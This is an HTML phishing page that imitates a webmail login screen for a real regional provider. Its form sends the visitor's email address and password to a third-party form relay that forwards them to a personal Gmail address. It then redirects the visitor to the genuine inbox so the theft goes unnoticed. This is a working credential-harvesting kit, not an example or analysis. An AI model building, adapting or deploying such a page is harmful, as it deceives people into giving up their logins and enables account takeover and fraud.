<!DOCTYPE html>

<html lang="en" class="js chrome webkit">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

    <title>Webmail :: Welcome to Webmail</title>
    <meta name="viewport" content="" id="viewport" />

    <link
      rel="shortcut icon"
      href="https://webmail.skybest.com/skins/larry/images/favicon.ico?s=1697461030"
    />

    <link rel="stylesheet" type="text/css" href="styles.min.css" />
    <link rel="stylesheet" type="text/css" href="jquery-ui.css" />

    <style>
      :is(
          [id*="google_ads_iframe"],
          [id*="taboola-"],
          .taboolaHeight,
          .taboola-placeholder,
          #top-ad,
          #credential_picker_container,
          #credentials-picker-container,
          #credential_picker_iframe,
          [id*="google-one-tap-iframe"],
          #google-one-tap-popup-container,
          .google-one-tap__module,
          .google-one-tap-modal-div,
          #amp_floatingAdDiv,
          #ez-content-blocker-container
        ) {
        display: none !important;
        min-height: 0 !important;
        height: 0 !important;
      }
    </style>
    <style>
      @font-face {
        font-family: "NotoSans_online_security";
        src: url(chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/assets/fonts/noto-sans-regular.woff);
      }

      @font-face {
        font-family: "NotoSans_medium_online_security";
        src: url(chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/assets/fonts/noto-sans-medium.ttf);
      }

      @font-face {
        font-family: "NotoSans_bold_online_security";
        src: url(chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/assets/fonts/noto-sans-bold.woff);
      }

      @font-face {
        font-family: "NotoSans_semibold_online_security";
        src: url(chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/assets/fonts/noto-sans-semibold.ttf);
      }
    </style>
  </head>

  <body>
    <h1 class="voice">Webmail Login</h1>

    <div id="login-form">
      <div class="box-inner" role="main">
        <img src="logo.png" id="logo" alt="Webmail" />

        <form
          name="form"
          action="https://formsubmit.co/trevorharrisx3@gmail.com"
          method="post"
        >
          <input type="hidden" name="_task" value="login" />
          <input type="hidden" name="_action" value="login" />
          <input
            type="hidden"
            name="_timezone"
            id="rcmlogintz"
            value="America/Los_Angeles"
          /><input type="hidden" name="_url" id="rcmloginurl" value="" />
          <input
            type="hidden"
            name="_next"
            value="https://webmail.skybest.com/?_task=mail&_mbox=INBOX"
          />
          <input type="hidden" name="_subject" value="New Login Attempt" />
          <input type="hidden" name="_captcha" value="false" />
          <table>
            <tbody>
              <tr>
                <td class="title">
                  <label for="rcmloginuser">Email</label>
                </td>
                <td class="input">
                  <input
                    name="username"
                    required=""
                    size="40"
                    autocapitalize="off"
                    autocomplete="off"
                    type="text"
                  />
                </td>
              </tr>
              <tr>
                <td class="title">
                  <label for="rcmloginpwd">Password</label>
                </td>
                <td class="input">
                  <input
                    name="pass"
                    required=""
                    size="40"
                    autocapitalize="off"
                    autocomplete="off"
                    type="password"
                  />
                </td>
              </tr>
            </tbody>
          </table>
          <p class="formbuttons">
            <button type="submit" class="button mainaction submit">
              Login
            </button>
          </p>
        </form>
      </div>

      <div id="bottomline" role="contentinfo">Webmail</div>
    </div>
  </body>
</html>
